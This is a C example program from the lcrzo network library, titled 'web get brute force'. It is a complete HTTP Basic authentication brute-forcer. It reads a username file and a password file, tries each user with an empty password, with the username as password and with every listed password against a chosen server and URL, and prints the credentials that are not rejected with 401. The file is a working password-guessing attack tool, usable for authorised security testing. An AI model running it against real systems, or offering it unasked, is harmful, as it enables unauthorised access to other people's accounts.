
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"
#include "shared/shared_http.h"

/*-------------------------------------------------------------*/
/* set information about this example */
lcrzoex_infos lcrzoex_000202=
{ /*reference*/     "lcrzoex", 202,
  /*version*/       1, 0,
  /*title*/         "real tcp client [web get brute force]",
  /*french title*/  "client tcp reel [web get brute force]",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "server_name server_port url usernamesfile passwdsfile",
  /*french usage*/  "nom_serveur port_serveur url fichierutilisateurs fichiermotsdepasse",
  /*usage example*/ "1.2.3.5 4444 /index.html /tmp/userlist /tmp/passlist",
  /*fr. usage ex.*/ "1.2.3.5 4444 /index.html /tmp/listutil /tmp/listepasswd",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000202_main(int argc, char *argv[]);
int lcrzoex_000202_http_get_brute(lcrzo_ipl ipl,
				  lcrzo_uint16 port,
				  lcrzo_conststring url,
				  lcrzo_conststring hostname,
				  lcrzo_conststring user,
				  lcrzo_conststring pass);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000202_main(int argc, char *argv[])
{ lcrzo_ipl ipl;
  lcrzo_uint16 port;
  lcrzo_data data;
  lcrzo_string user, pass;
  lcrzo_int32 datasize;
  int fduser, fdpass;

  if ( argc<6 )
  { /* print usage */
    lcrzo_epr(lcrzoex_infos_print(lcrzoex_000202, argv[0]));
    return(LCRZO_ERR_BULCRZOEXBADUSAGE);
  }

  /* initialize the needed variables */
  lcrzo_epr(lcrzo_ipl_init_hs(argv[1], &ipl));
  port=(lcrzo_uint16)atoi(argv[2]);
  lcrzo_epr(lcrzo_fd_open_read(argv[4], &fduser));

  /* read each line of the files all try to access */  
  while ( lcrzo_fd_readm_line(fduser, LCRZO_TRUE, &data, &datasize)
	  == LCRZO_ERR_OK )
  { user=data;
    user[datasize]='\0';
    /* first, try with pass=="" */
    lcrzo_epr(lcrzoex_000202_http_get_brute(ipl, port, argv[3], argv[1],
					    user, ""));
    /* then, try with pass==login */
    lcrzo_epr(lcrzoex_000202_http_get_brute(ipl, port, argv[3], argv[1],
					    user, user));
    /* then try each password of the file */
    lcrzo_epr(lcrzo_fd_open_read(argv[5], &fdpass));
    while ( lcrzo_fd_readm_line(fdpass, LCRZO_TRUE, &data, &datasize)
	  == LCRZO_ERR_OK )
    { pass=data;
      pass[datasize]='\0';
      lcrzo_epr(lcrzoex_000202_http_get_brute(ipl, port, argv[3], argv[1],
					      user, pass));
      lcrzo_string_free(pass);
    }
    lcrzo_epr(lcrzo_fd_close(fdpass));
    lcrzo_string_free(user);
  }

  /* close */
  lcrzo_epr(lcrzo_fd_close(fduser));
  return(LCRZO_ERR_OK);
}

/*-------------------------------------------------------------*/
int lcrzoex_000202_http_get_brute(lcrzo_ipl ipl,
				  lcrzo_uint16 port,
				  lcrzo_conststring url,
				  lcrzo_conststring hostname,
				  lcrzo_conststring user,
				  lcrzo_conststring pass)
{ static lcrzo_int32 numtest=0;
  lcrzo_sock sock;
  lcrzo_int16 errornumber;
  lcrzo_string errormsg;
  
  /* open the connection */
  lcrzo_epr(lcrzo_sock_tcpcli_real(ipl, port, &sock));
  
  /* send a request */
  lcrzo_epr(shared_http_request_get(&sock, url, hostname, port, 
				    user, pass));

  /* analyze the answer */
  lcrzo_epr(shared_http_response_readheader(&sock,
					    &errornumber,
					    &errormsg,
					    NULL, NULL, NULL, NULL, NULL));
  if ( errornumber!=401 )
  { printf("%s\t%s\t-> %d (%s)\n", user, pass, errornumber, errormsg);
  }
  else
  { numtest++;
    if (!(numtest%10)) printf("%ld passwd tried\n", numtest);
  }
  lcrzo_string_free(errormsg);

  /* close */
  lcrzo_epr(lcrzo_sock_close(&sock));

  return(LCRZO_ERR_OK);
}



